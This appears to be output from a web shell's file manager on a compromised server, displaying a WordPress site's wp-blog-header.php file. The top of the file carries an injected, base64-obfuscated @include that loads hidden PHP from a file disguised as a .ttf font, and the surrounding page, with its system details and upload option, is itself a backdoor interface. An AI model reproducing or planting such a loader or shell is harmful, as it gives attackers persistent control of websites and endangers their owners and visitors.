HEX
Server: Apache
System: Linux op-sv037.home.net.pl 6.8.2 husak_dirty_pages_fix #1 SMP PREEMPT_DYNAMIC Tue Apr 2 22:06:51 CEST 2024 x86_64
User: (3327706)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /kadokaarchitekci.pl/www/wp-blog-header.php
<?php @include base64_decode("L2thZG9rYWFyY2hpdGVrY2kucGwvd3d3L3dwLWluY2x1ZGVzL1RleHQvRGlmZi9FbmdpbmUvcnFwcG5ybm5wcm9zbi50dGY=");?><?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once __DIR__ . '/wp-load.php';

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once ABSPATH . WPINC . '/template-loader.php';

}